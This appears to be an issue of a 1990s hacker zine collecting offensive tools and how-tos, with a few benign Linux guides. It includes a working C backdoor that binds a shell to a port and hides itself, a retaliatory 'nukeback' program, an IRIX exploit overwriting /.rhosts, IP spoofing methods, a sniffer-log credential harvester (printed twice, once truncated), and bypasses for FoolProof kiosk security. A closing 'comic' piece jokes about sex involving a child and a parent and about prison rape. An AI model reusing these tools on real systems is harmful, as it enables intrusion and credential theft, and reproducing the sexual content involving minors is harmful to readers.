
    [backdoor.c]-------------------------------------| jsbach | 


/* backdoor.c by jsbach@bear.cs.zorg.edu.
that dup2() shit was ripped from pluvius@io.org.

compiles fine on *BSD*, linux, and solaris (on solaris -lsocket)
..  to hide the process i strcpy("", argv[count]);, making it invisible
on solaris and pretty inconspicuous on BSD and linux.

basically, this binds a program to a specified port and listens
for a connection.  when you exit the program, you DON'T get dropped
to a shell, so you can let people bounce telnet connections off
your box but not access anything else, or whatever.

Example usage:
./backdoor /bin/sh 31337 p@55w0rd &
or
./backdoor /bin/sh 31337

 */

#define DATA "Hello.  Please place semicolons after commands in shell mode :P\n---\n"
#include <sys/types.h>
#include <sys/socket.h>
#include <signal.h>
#include <netinet/in.h>

int sockfd, count, clientpid, socklen, serverpid, temp, temp2,temp3;
struct sockaddr_in  server_address;
struct sockaddr_in  client_address;

main(int argc, int **argv)
{
char password[ sizeof( argv[3] ) ];
char passwordchk[ sizeof( argv[3] ) ];

count=0;
if (argc < 3) {
        printf("usage: %s program_to_run port_number password(optional)\n",argv[0]);
        exit(-1);
        }                
if (argc == 4)
        {
        strcpy((char *)&password, argv[3]);
        strcpy((char *)argv[3], "");
        }

printf("\n-----\nDaemon running %s on port %d.  PID is %d.\n-----\n",argv[1], atoi(argv[2]), getpid());
sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); /*add error checking*/

bzero((char *) &server_address, sizeof(server_address));
strcpy((char *)argv[0],"");
server_address.sin_family=AF_INET;
server_address.sin_port=htons(atoi(argv[2]));
strcpy((char *)argv[2],"");
server_address.sin_addr.s_addr=htonl(INADDR_ANY);
bind(sockfd, (struct sockaddr *)&server_address, sizeof(server_address));

listen(sockfd, 5);
signal(SIGHUP, SIG_IGN);


while(1)
{
socklen=sizeof(client_address);
temp=accept(sockfd, (struct sockaddr *)&client_address,&socklen);

if(argc == 4)
{
while(1)
        {
        write(temp, "Password: ", 10);
        read(temp, &passwordchk, sizeof(password));
        if(strncmp(passwordchk, password, sizeof(password)) == 0)
                break;
        bzero(passwordchk,sizeof(passwordchk));
        }
}

write(temp, DATA, sizeof(DATA));
if (temp < 0) exit(0);
clientpid=getpid();
serverpid=fork();
if (serverpid != 0)
        {
        dup2(temp,0); dup2(temp,1); dup2(temp,2);
        execl(argv[1],argv[1],(char *)0);
        }
        close(temp);
        }
}


  (15)------------SECURITY--------------------------------------(15)
 
  
 


 [Ip Spoofing]-------------------------------------| optiklenz | 


  GENERAL:
    - System A tries to open a connection to system B.  System B accepts
      the connection (or not) and sends back a response- the connection
      gets established and interact.
    - Requires trust between A and B.

  SOURCE-ROUTE:
    - System A wants to 'fake' one of your systems addresses to talk w/
      system B (the address to be 'faked' is assumed trusted to B).  The
      exact same thing happens as above except the first-hop gateway from
      system A has been set up to route YOUR netmask to system A and system
      A has been set up with the trusted address on your net.  The other 
      is that system A is 'source routing' (LSR if distant) to your net w/
      the first-hop's address in the route, so when system B answers its
      buddy the trusted system, the packets are actually going to system A's
      first-hop and getting routed to system A. The fix
      is to disallow source-routing o'course.
    - Requires control of first-hop routing from A and that system B's net
      allows source-routing.

  SPOOF (DNS spoofing)
    - System A finds r* programs on system B and modifies the reverse DNS
      entries for system A to look like a system that B trusts.  System A
      connects to system B, B looks up the DNS entry and gets back a host
      that B trusts.  Easy, ugly.  Fix is tcp-wrappers or replace r*'s.
    - Requires control of reverse DNS tables w/ system A's address and the
      default/stupid r* command daemons on system B.

  SPOOF (DNS spoofing w/ cache poison)
    - As above but system A 'volunteers' an IP address in an MX record to
      system B's DNS cache so that if tcp-wrappers are running the second
      lookup and compare w/ also succeed. 

  SPOOF (IP level 'blind' spoofing):
    - System A shuts down the trusted host on your network via quirks in the
      implementations of TCP/IP (or waits for it to go down or whatever).
      System A sends a non-source-routed connect packet to system B using
      the trusted hosts's network address, just like the trusted host would
      have done if it were initiating a connection.  System B sends out the
      response to it's buddy and it stays on the local subnet (why would it
      have any desire to leave ?).  System A never gets the response, but
      the seq# guessing code doesn't care, it just guesses the next seq# in
      the chain of packets that system B would expect and pretends it has an
      open connection (which to system B it does, but system A has no way of
      really knowing that- thus, it (system A) is acting 'blind').  The point
      of the exercise is to send system B something that gives system A some
      kind of access/feedback.  The fix, don't allow external packets into
      your network that have internal addresses. 
    - Requires system B's net to allow external packets w/ internal addresses.


   GAINING TRUST RELATIONSHIP 

         One fashion of accomplishing this would be setting up 
         a circumstantial ralationship between system A, and system B
         in the main directory of system A create a .rhosts file 
         echo B uid > ~/.rhosts, and the same on system B

         Same method goes for Sco Unix if you rlogin as root to a system 
         via a  trusted host (one which is in the etc/hosts.equiv)a passwd
         is not required

    VHOST vs SPOOFING

         I've seen various people on irc who beleive that because they
         are irc'ing with a vhost they are spoofed.  That is definitly
         no the case. A Vhost (Virtual Host) is merely the ability for 
         a machine to be a web server for multiple domains.
  
         vhost i;e  advisory.legions.org <--[vhost]


(16)------------SECURITY--------------------------------------(16)


 [Anal Sniff]-------------------------------------| chronic | 

      download@ http://www.legions.org/chronic/sniff.c

 [Back Attack]-------------------------------------| chrak | 

/*compile: cc nukeback.c -o nukeback -Wall
let it run like a shell script that nukes them back or something
run on port 1 to stop portscanners quickly
written by chrak*/ 

#include <stdio.h>
#include <netinet/in.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdlib.h>

void main(int argc, char **argv)
   {
   int s_sock,c_sock,i;
   struct sockaddr_in s_info, c_info;
   char comline[66], *nuker;

   if(argc != 3)
      {
      printf("usage: %s port nuker\n", argv[0]);
      exit(EXIT_FAILURE);
      }
   s_sock = socket(AF_INET, SOCK_STREAM, 0);

   s_info.sin_family = AF_INET;
   s_info.sin_addr.s_addr = htonl(INADDR_ANY);
   s_info.sin_port = htons(atoi(argv[1]));

   bind(s_sock, (struct sockaddr *)&s_info, sizeof(s_info));
   i = sizeof(c_info);
   listen(s_sock, 1);
   for(;;)
      {
      for(i=0;i<66;i++) comline[i] = '\0';
      i = sizeof(c_info);
      c_sock = accept(s_sock, (struct sockaddr *)&c_info, &i);
      send(c_sock, "bleh?\n", 6, 0);
      close(c_sock);
      nuker = inet_ntoa(c_info.sin_addr);
      printf("Connect from %s\n", nuker);
      sprintf(comline, "%s %s", argv[2], nuker);
      printf("Doing %s\n", comline);
      system(comline);
      printf("Waiting for next bitch...\n");
      }
   }
 

  (17)------------SECURITY--------------------------------------(17)
 

 [IRIX LMR]-------------------------------------| optiklenz | 

   

   This is found to effect Irix 5.3, but is also vulnr on 6.1,
   and 6.2.  This exploits license_eoe.sw.license_eoe. Note: LicenseManager 
   is GUI used to license subsystem.  This allows you to install, update 
   , and remove FLEXlm and NET_LS licenses. Any user with access to 
   X screen would be able to run it. 
   

   $ setenv netls_lincense_file /.rhosts
   $ /usr/etc/LicenseManager 

   
(18)------------SECURITY--------------------------------------(18)

 [Securing Linux]-------------------------------------| BlackIC | 



This will explain some basic security mesures you can take after
installing a linux system. This is based of a slackware install but the
information should be good for other distributions also.

First off, before you do anything you need to
goto /etc/inetd.conf and take out all the services you dont need, for now
comment them all out by adding a # in front of the line.If you plan to use
telnet and ftp read the later chapter on securing those services. Now for
changes to take effect type ps, get the pid of inetd and type kill -HUP
inetd.

Next
you will want to goto /etc/rc.d/rc.inet2 and comment out the folowing lines.
# Start the SUN RPC Portmapper.
#if [ -f ${NET}/rpc.portmap ]; then
#   echo -n " portmap"
#  ${NET}/rpc.portmap
#fi
# # Start the various SUN RPC servers.
if [ -f ${NET}/rpc.portmap ]; then
  # Start the NFS server daemons.
  if [ -f ${NET}/rpc.mountd ]; then
    echo -n " mountd"
    ${NET}/rpc.mountd

Now if you plan on having users on your systems i recomend getting sshd
installed for a more secure shell, you can read about it and download it at
http://www.cs.hut.fi/ssh/. Also make sure you have the most current kernel
(which of the time of this writing is 2.0.33), I also recomend getting the
Rhino9 Linux Security Auditer Tool availible at rhino9.org, it will check
for suid programs and other possible security holes, also if you are gonna
give out shells make sure you trust these people, also update your passwords
at least once a month or more and make sure there good passwords not like
"god" "password1" "dog", some examples of good ones are "x3toyC34j8gg2", if
your reading this that means you probaly have a newer distribution so it
already has shadow passwords built in, i wouldnt recomend trying to install
them if you dont, due to the fact i have seen a few people have big probs
because of it.

This guide was not meant to insure your security in any way, just because
new exploits come out all the time, so keep yourself updated at cert.org or
rootshell.com.
also as a final note, your system will never be 100% secure,
as no system is, so like um dont blame me if you get fucked over

 (19)------------SECURITY--------------------------------------(19)
                  

  [FoolProof]-------------------------------------| Duncan Silver | 


In's and Out's of FoolProof control (not so foolProof after all)
        I thought long and relativelly hard about what my article is going
to be about. Instead of bombarding you with yet another "l33t" article on
vulnerabilities and things that have been written about over and over, I 
decided to bring you something new, and while it may not be as glamorous as 
some of the other topics I could have chose, at least it is completelly new,
and unknown (to the best of my knowledge).  Hope you find it usefull.
                                                      - Duncan Silver
--------------------------
What is Foolproof Control: 
FoolProof Control is a security program manufactured by SmartStuff Software,
designed for windows 3.1, windows95, and MACOS. The purpose of this program 
is to restrict access to certain programs and devices (for example, default 
setup locks out access to hard drive, any preferences, options, etc.).  This 
program is quite usefull (and widelly used) is public institutions like 
school's and library's. FoolProof is basically a simple TSR (terminate and stay
resident) program, executed at the startup time (yes, in some cases it can be 
bypassed by ctrl+break during startup). The restricted access features are 
considered locked by the computer, and are simplly not available. To unlock 
the restricted features, you need to enter the password.

----------------------------
A word on FoolProof passwords:  
FoolProof priviledged users are divided into two categories: the users with 
access to all features, and users with access to FoolProof configuration 
itself. This simplly means that there are two means of authorization, first 
being clicking on the foolproof icon and entering the password (minimum of 6 
charachters) which gives you access to foolproof configuration, and the second 
method being the hotkey.  Now, I found hotkey feature to be quite interesting.  
You see, hotkey is set of 4 keys which need to be pressed at the same time.  
When this occurs, FoolProof is removed from the memory, enabeling all the
features. You are free to do as you please, however you are still unable to 
configure foolproof or change the hotkey. After messing around with it for a 
long time (and installing some key loggers) I found that the hotkey always 
constitutes of CTRL+SHFT+two alphabet charachters.  I'm not sure if this 
is only how they do it at the place where I tested it, or if this is a requirement.  

-----------------------------
Now that we have an idea of what it is, and what it does, we can
move into the interesting part: defeating it.
-----------------------------
Preamble:  
I spent quite some time messing around with FoolProof controll, 
and I have discovered a major flaw affecting all the versions released so
far.  I wrote to SmartStuff explaining this problem, and about a month later I
recived mail from them stating that they have been "unable to reproduce the
problem".  It's quite obvious that their response is B.S, since I have
exploited this vulnerability on several different sites.  

----------------------------
Windows 95 + 3.1
DA FLAW:  This is quite funny actually, but while messing around on one of
these FoolProof protected machines, I came upon a wonderous idea.  In the
location window I entered: c:\.  Needless I say the "protected" contents of
the hardrive appeared before me.  I am now able to execute any binary file
simplly by clicking on it.  However, I wanted more, I wanted to disable this
FoolProof joke for good.  It turns out that if you try to open autoexec, 
netscape will execute it, which does you no good.  The way around this is to
right click on the autoexec.bat file and then chose edit.  Contents of
autoexec are displayed in notepad, and after removing any references to
foolproof, do the same thing with config.sys.  After saving both files,
simplly reboot.  

WHY oh WHY does this work?  
Well for the technicall part of it, foolproof restricts access to USERS, 
and when I typed c:\ in the netscape location window, the machine saw me as 
NETSCAPE instead of an USER.  Same thing with saving autoexec.bat and 
config.sys to the drive, the foolproof thinks that netscape is trying to save 
these files, and since netscape is a program, it has any right to do whatever 
da fuck it wants to do.  Pretty simple eh?  

------------------------
Machintosh:
Well, what can I say?  I was never much of a Machintosh fan.  Somebody went
ahead of me in writting an article on defeating FoolProof for Machintosh, so
the full credit for this section goes to tristan_durie@starbase.ca.
   
   1. One way to disable FoolProof is to hold down the space bar when
   boot up the computer. The extensions Manager will then appear and you
   can then turn off the FoolProof Extension. (You can also just hold
   down the Shift key when you start up. This will turn of the
   Extensions. This only works when the admin of the computer has set up
   FoolProof so that it doesn't ask for a password to access the Hard
   Drive so using the Shift key doesn't usually work.)
   
   2. Drag a folder (other than extensions folder) onto the launcher and
   it will then make an alias in the launcher items folder. You can then
   drag the FoolProof extension onto the alias of the folder on the
   launcher. This will move the FoolProof Extension into the folder.
   Restart the computer and the FoolProof extension will no longer be in
   the extensions folder and FoolProof will be disabled. (This methood is
   also useful for moving files around the Hard Drive when FoolProof
   disables dragging.)

      3. Create a AppleScript program with a script like this:

   tell application "Finder"

   activate

   choose file

   copy the result to File1

   choose folder

   copy the result to Folder1

   move File1 to Folder1

   end tell

   Run this script and choose the FoolProof Extension and then choose a
   folder other than the Extensions folder. Restart the computer and
   FoolProof should be disabled.

     4. Run DropStuff and stuff the FoolProof Extension being sure to click
   the "delete file after stuffing" check box. Press OK and restart the
   computer after it has finished stuffing. The FoolProof Extension will
   be compressed so it won't work.(The original FoolProof extension was
   deleted because you checked the "delete file after stuffing" check
   box.)

   5. If the get info command is disabled and you want to unlock
   something or change the memory allocation search for the file that you
   want to change using the FindFile. You can get info on files in window
   of FindFile. This is fairly useful for unlock the FoolProof Control
   Panel, preference or the FoolProof Extension because they lock every
   time you restart or open the FoolProof Control Panel. You can also use
   this method to replace the FoolProof extension, Control Panel or
   Preferences because you can't replace them if they are locked. (The
   older version of FoolProof allows you to move files into the trash and
   other folders using the FindFile.)
   
   6. If you can run programs from a disk it is very simple to disable
   FoolProof. Make a program that deletes the FoolProof extension or you
   could use ResEdit to delete all the resources from the FoolProof
   extension and restart.

   7. All of the settings for the FoolProof options are stored in the
   FoolProof preferences. You can change the settings by switching the
   preferences file with the one I have provided with this stack.
   Unfortunatly, the password is already set to one that I don't know but
   password protection is disabled. All the settings are disabled when
   you install this preference file.

   8. If you can't run programs of disks but you can use documents you
   can create a Hypercard stack using hypercard externals that will
   delete the FoolProof Extension. You can then run this stack using
   Hypercard Player on the protected computer.

------------------------
One more stupid trick:  Another stupid trick the "foolproof administrators"
like to do is to disable only certain menu's of the applications.  Let me
give you an example: after deciding that we cannot have students running
wherever they please on the internet, the administration bought membership 
to some gay-assed proxy server named Bess which restricts access to anything
that could even remotelly be considered fun (no, I'm not talking about porn,
you sick0's). Well, normally, we would start netscape, go to options menu
select network preferences, and turn off the proxies and go about our
business. FoolProof allowed admins to disable the options menu.  To bypass
this idiocy, simplly go to netscape mail, notice how a new window openes,
containing all the menu's including options.  Many times admins forget to
disable these menus (well, actually all the time ;) So, that's another thing
you might want to try.

-------------------------
What FoolProof makers say about their product:
"FoolProof Security, the most advanced version of the
   desktop security licensed on over one million school computers, is the
   market leader. FoolProof Security first began provide protection of
   systems and hard drives in 1993. The current version provides work
   groups with distinct privileges, including where users can save
   documents, program access, including internet programs and control of
   software downloaded from the internet."
What I say about their product:
"haha"

--------------------------
Conclusion:  In conclusion, FoolProof is an expensive piece of software
that's definitelly not worth it.  It's a piece of crap, and very easily
defeated.  If you are administrator planning to implement some security on
dos or windows machines I recomend Fortress software.
  (20)------------MISC--------------------------------------(20)


                    - { = - = M  I  S  C = - = } -




[56kpnp Linux]-------------------------------------| mosoka | 


        This linux HOWTO examines the basic ways to setup your 56k compatible
modem under the Linux operating system, how to get isapnptools to find and
configure your modem correctly and also how to set other setting that are 
critical in your modem installation process.

1: Introduction
        
        The aim of this document, basically as stated above is to get your
56k modem to work in Linux. Modem installation under Linux in most cases aren't
very complicated but its the new technology introduced with Windows 95 that has
complicated matters. Such modems like Winmodems and modems that get 
configured using the Plug and Play method are the problem. Linux, currently has
no Plug and Play support but their are some ways to get around it and hopefully
by the end of this document everything will be working normally if not better
then before.



2: Setting Up

2.1: What Modem Do You Have

        The first part of the solution is to become knowlegable with your
modem and who makes its, model numbers, etc.. Some things that you should
look out for are the following models: Winmodems and other modems that use
Windows caching methods. If you have one of these models, stop reading this
document and try and get your money back. Winmodems, as of yet, are 
uncompatible with Linux because of their methods of caching and setup. After
you have found your model name and numbers you should take a visit to the 
homepage or bbs of your Linux distrubution company. In my case, I use
OpenLinux so I would visit www.caldera.com. Most Linux companies have
a list of compatible and uncompatible hardware for their distrubutions and 
thats what your looking for. The simplest method to finding this would 
be to search the site for your modem model and if it comes up as a hit
under compatible hardware, your in luck. If by chance it come up in
uncompatible hardware, you still may be able to get it working but
it will take some time and a lot of work. If you were unable to find a
compatible/uncompatible hardware list its allright, it isn't really 
important but you should still try and contact your Linux distrubution
company by other means and try to find out if its compatible or not.

2.2: Doing Some Research

        The next part of setting up your modem is raid as many newsgroups
and support archives you can to get a backround on your modem. You will be
surprised at how many people are in the same situation as yourself. When I
was tring to figure out how to configure my modem, I met some guy who was in
the same situation and did try to offer some help but it didn't work probably
due to the differences in our operating systems. A good place to check for your
modem model is to go to www.metacrawler.com and search throught the newsgroups
selection for your modem model. If you don't get that many hits searching 
the newsgroups you can all try "linux and <your modem model here>" in the 
web search option. If your modem is not Plug and Play, skip down to Configuring
Your Modem In Linux.

2.3: Downloading Files

        Allright, now that you know your modem you should be able to determine
weather or not is Plug And Play or not. Now a days, most internal modems are
Plug and Play and you will need to download a program called isapnptools in
order to configure them. Isapnptools is the leading and currently the only
Plug and Play configuration tool for the Linux operating system. It can 
be found at www.roestock.demon.co.uk/isapnptools/. At the time of this
document, the latest version 1.13 and is available in many formats from
tar gzip to rpm. Basically, thats the only file you will need.

2.4: Configuring Isapnptools

        Isapnptools comes with a tool called pnpdump which will scan your
system for your Plug and Play device and find all the different ways it can
be configured. Now is a good time to get out some paper and copy down some
configurations cause you will need to write a config file next. From the
information from pnpdump, you now must make a file called isapnp.conf.
Basically, The stuff that you saw on your screen when your ran pnpdump and
copied down on paper you will just need to put it in this file, so pick the
best setup for your system that doesn't conflict with any other devices
and start typing in your isapnp.conf file. For an example, here is my
isapnp.conf file so you can see what i'm talking about:

(READPORT 0x3bb)
(ISOLATE)
(IDENTIFY *)
(CONFIGURE MOT1550/90238999 (LD 0
(IO 0 (BASE 0x3e8))
(INT 0 (IRQ 7 (MODE +E)))
(ACT Y)))
(WAITFORKEY)

        If your having trouble and don't understand you can formulate a
config file from my example. First you can copy and paste the frist 3 lines
and put them into your file. This will make a list of the Plug and Play 
devices you have installed. At this point, save your isapnp.conf file and
run it. It will tell you the device name and serial numbers of the devices 
when you load up isapnp with your isapnp.conf file. Copy the device name and
serial number off your screen and paste them into your isapnp.conf file in this
format "(CONFIGURE <devicename/serialnumber> (LD 0". In the next line, you need
to decide what port you want to put your modem in. You should pick a port
that obviously doesn't have anything in it or is configured in your linux.
In my example, I'm using port com 3 which in hex is 0x3e8. If you want to use
a different port, just change the hex address after the command "BASE". Lasty,
you need to configure what irq your modem will use. In my example, I'm using
irq 7. If you want to use a different one, like with the port address, just 
change the number after the command "IRQ". The last two lines of the config
file are manditory and you should just copy and paste them in. Next, you need   setup a program called setserial. To do this you should make a file called 
"modem" in your isapnptools directory and have it consist of the following:

isapnp isapnp.conf
setserial /dev/ttyS<com # - 1) irq <irq of your modem here> autoconfig
setserial /dev/ttyS<com # - 1) spd_vhi
setserial /dev/ttyS<com # - 1) 
stty -echo < /dev/ttyS<com # - 1)

        Note that the field <com # - 1> means that you should take the com 
port number where your modem is in and subtract one from it. For example, my
modem is com 3 so I would use: "/dev/ttyS2". Save your "modem" file and make
it executable by typing in: "chmod +x modem" and lastly, run it.. Now that  
your Plug and Play device is configured, you need to configure linux to the 
settings you just set to your modem.

2.5: Configuring Your Modem In Linux

        If you modem Plug and Play, you allready set it up to a com port and
irq address but if its not, you need to open your computer up and set it 
up using dip switches or jumpers but if you allready set them for windows then
you don't need to reset them. Next thing you need to do if your modem is
Plug and Play or not, is go to your Linux setup program. For example, the
Linux setup program in Openlinux is Lisa and in Slackware, its setup. In the
setup program, configure Linux to the settings you set using isapnptools or
the settings you set using your jumpers or dip switches.

3: Finished At Last

3.1: Thats It, Your Done

        Allright, Congratulations.. You have now setup your modem in linux.
To use it, just use the device name of /dev/tty<com # - 1> in communication
programs like minicom or in ppp dialing scripts. I hope this faq was able
to answer all your questions you had about setting up your 56k modem in
linux and reached the goal of getting it to work.. 



  (21)------------MISC--------------------------------------(21)


/* sniffer log searcher,for quickly checking a sniffer log to see if theres
any new entrys in it,by chrak*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <strings.h>


void main(int argc, char **argv)
   {
   int i, type = 0 , o = 0; /*type -t 1,-f 2,-tf 3,-r 4,-tr 5,-rf 6,-trf 7*/
   char c[80], ignore[30];
   FILE *fp1, *fp2;

   if(argc == 1) 
      {
      printf("%s -l log -tfr -o out\n-l solsniffer log to open\n"
             "-t get telnets\n-f get ftps\n-r get rlogins\n-o out file"
             " - else stdout\n-i ignore string - ignores output with"
             " given string\n", argv[0]); 
      exit(EXIT_FAILURE); 
      }
   while((i = getopt(argc, argv, "l:o:i:tfr")) != -1)
      {
      switch(i)
         {
         case 'l' : printf("input: %s\n", optarg);
                    if((fp1 = fopen(optarg, "r")) == NULL)
                       {
                       printf("Cant open file %s\n",optarg);
                       exit(EXIT_FAILURE);
                       }
                    break;
         case 'o' : printf("output: %s\n", optarg); 
                    fp2 = fopen(optarg, "a");
                    o = 1;
                    break;
         case 't' : printf("telnet\n");
                    type = 1+type; 
                    break;
         case 'f' : printf("ftp\n");
                    type = 2+type;
                    break;
         case 'r' : printf("rlogin\n");
                    type = 4+type; 
                    break;
         case 'i' : printf("ignore: %s\n", optarg);
                    strcpy(ignore, optarg);
                    break;
         }
      }
   for(;;)
      {
      if((fgets(c, 80, fp1) == NULL)) break; 

      if(strstr(c, ignore) == NULL)
         {
         if(type == 1 || type == 3 || type == 5 || type == 7)
            if(strstr(c,"(telnet)") != NULL)
               {   
               if(o==1) fprintf(fp2, "%s", c);
                  else printf("%s", c);
               }
         if(type == 2 || type == 3 || type == 6 || type == 7)
            if(strstr(c,"(ftp)") != NULL)
               {
               if(o==1) fprintf(fp2, "%s", c);
                  else printf("%s", c);
               }
         if(type == 4 || type == 5 || type == 6 || type == 7)
            if(strstr(c,"(rlogin)") != NULL)
               {
               if(o==1) fprintf(fp2, "%s", c);
                  else printf("%s", c);
               }
         }
      }   
   fclose(fp1);
 
             
     (22)------------MISC--------------------------------------(22)
 
  
 [Sniff Log]-------------------------------------| chrak | 

/* sniffer log searcher,for quickly checking a sniffer log to see if theres
any new entrys in it,by chrak*/

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <strings.h>


void main(int argc, char **argv)
   {
   int i, type = 0 , o = 0; /*type -t 1,-f 2,-tf 3,-r 4,-tr 5,-rf 6,-trf 7*/
   char c[80], ignore[30];
   FILE *fp1, *fp2;

   if(argc == 1) 
      {
      printf("%s -l log -tfr -o out\n-l solsniffer log to open\n"
             "-t get telnets\n-f get ftps\n-r get rlogins\n-o out file"
             " - else stdout\n-i ignore string - ignores output with"
             " given string\n", argv[0]); 
      exit(EXIT_FAILURE); 
      }
   while((i = getopt(argc, argv, "l:o:i:tfr")) != -1)
      {
      switch(i)
         {
         case 'l' : printf("input: %s\n", optarg);
                    if((fp1 = fopen(optarg, "r")) == NULL)
                       {
                       printf("Cant open file %s\n",optarg);
                       exit(EXIT_FAILURE);
                       }
                    break;
         case 'o' : printf("output: %s\n", optarg); 
                    fp2 = fopen(optarg, "a");
                    o = 1;
                    break;
         case 't' : printf("telnet\n");
                    type = 1+type; 
                    break;
         case 'f' : printf("ftp\n");
                    type = 2+type;
                    break;
         case 'r' : printf("rlogin\n");
                    type = 4+type; 
                    break;
         case 'i' : printf("ignore: %s\n", optarg);
                    strcpy(ignore, optarg);
                    break;
         }
      }
   for(;;)
      {
      if((fgets(c, 80, fp1) == NULL)) break; 

      if(strstr(c, ignore) == NULL)
         {
         if(type == 1 || type == 3 || type == 5 || type == 7)
            if(strstr(c,"(telnet)") != NULL)
               {   
               if(o==1) fprintf(fp2, "%s", c);
                  else printf("%s", c);
               }
         if(type == 2 || type == 3 || type == 6 || type == 7)
            if(strstr(c,"(ftp)") != NULL)
               {
               if(o==1) fprintf(fp2, "%s", c);
                  else printf("%s", c);
               }
         if(type == 4 || type == 5 || type == 6 || type == 7)
            if(strstr(c,"(rlogin)") != NULL)
               {
               if(o==1) fprintf(fp2, "%s", c);
                  else printf("%s", c);
               }
         }
      }   
   fclose(fp1);
   if(o==1) fclose(fp2);
   }


                  - { = - =C  O  M I  C   R E  L I  E F= - = } -

                          With guest editor Analyzer


[Young Hackers, and Jail]-------------------------------------[Analyzer]


Greetings from the fighting grounds of israel.  
I am your guest editor for this month.  Let me 
start off by introducing myself to those of you
who have failed to notice my L33tness.  I am Analyzer,
and was born in Mymomsucksyouall israel.  My nickname 
comes from many generations of seksi anal seks0rs. 
My mother died when I was 14 from an anal concussion
I never thought that my little prick would end up 
killing her. Anyway after her death I was in shock
 so I started hanging on the net alot. And
having sibor seks on irc in #young_child_sex where i
felt welcome. Just when things were going ok, my goat 
humpry was bombed by the israel military I lubbed 
humpfry he was my only friend in the whole wide world
after his death i took my anger out on the government
not for killing a friend, but for killing a lover. 
Well Enough about my gay, and boring life.  This all
started when me, and a couple of friends got together 
to hax0r the goberment cause they wer fuckin un elite 
and shit and they killed humpfry so i was pissed you know?  
ok so me Juan Carlos, and Don Mexicano got together a family
of over 100 immirgrants, and rented out a warehouse for
our elite operation. Once things were set, and we taught
the immirgrants our elite ways we started hacking away. 
The method i used is very complex and hard

Here it is: ./statd url.gov   Holy shit?!! you say?!?  you'll
never get it you say?!? well dont worry it took me months
to figure it out and im fucken mad elite and shit

Really it's nothing special we just sat there feeding
government url's to a list  and then we gained root.
I guess the government is pretty fucken dumb because
it took them 2 months to figure out how to use
the tekniq 2 more days than it took me. Our attack
was called the most systematic attack eber. (th4tz c4us3
w3 c4n typ3 a1l el8, 4n FuNky.) and because "statd"
is what you call "anonymous"..



Jail is really a bad bad thing I neber would eber go again. My first
bad experience in jail was with what you americans call "soap"
one day I was rubbin and scrubbin, and OOPSIE! the soap dropped
so i bent down to pick it up, and for no reason my ass started
moving back and forth and my hips side to side.  I thought to myself
"hrmmm", and kept looking for the soap the feeling really did'nt bug 
me at all I kinda liked it.  Once I found the soap I stood, and
heard a suction type sound coming from my ass it was funny, but
my asshole wasn't hurting anymore so it really did'nt bug me. Then
all of a sudden I was approached from behind.  I guess in american
network security you would call what happens next an "outside attack"
I was forced to the ground, and then anal seks0red...


After my shower I was assigned a cell block with my new cellmate
Bubba. it was there where i was forced to perform oral sex "again"
My dad had already taught me this method you americans call 
"giving head" infact I still have my dads teef marks on the 
tip of my pee pee, every day I look at it to remember the good
times dad, and I had (those were the days).


The morale of this story is that well if you go
to jail you get screwed look
the  exterme close ups of my anus below

ANAL SHOTS.
    (_|_)             (_o_)
                           '
 
    BEFORE-JAIL      AFTER JAIL


=============================================================================
|| Download Legions Text Files, and Zines at the following Boards:         ||
=============================================================================
|| Under The Influence...........(ALM)OST-HERE.............World HQ....... || 
|| Narkotik Illusions............(303)PRI-VATE.............Midwestern HQ.. ||
|| Exodus BBS....................(707)935-6867.............Distro Site.... ||
|| Electric Rush (NuP)...........(707)257-7208.............Distro Site.... ||
=============================================================================
|| Leave comments, Death Threats, ideas to webmaster@legions.org           ||
=============================================================================
|| Knowing what you cannot do is more important than knowing what you can. ||
=============================================================================

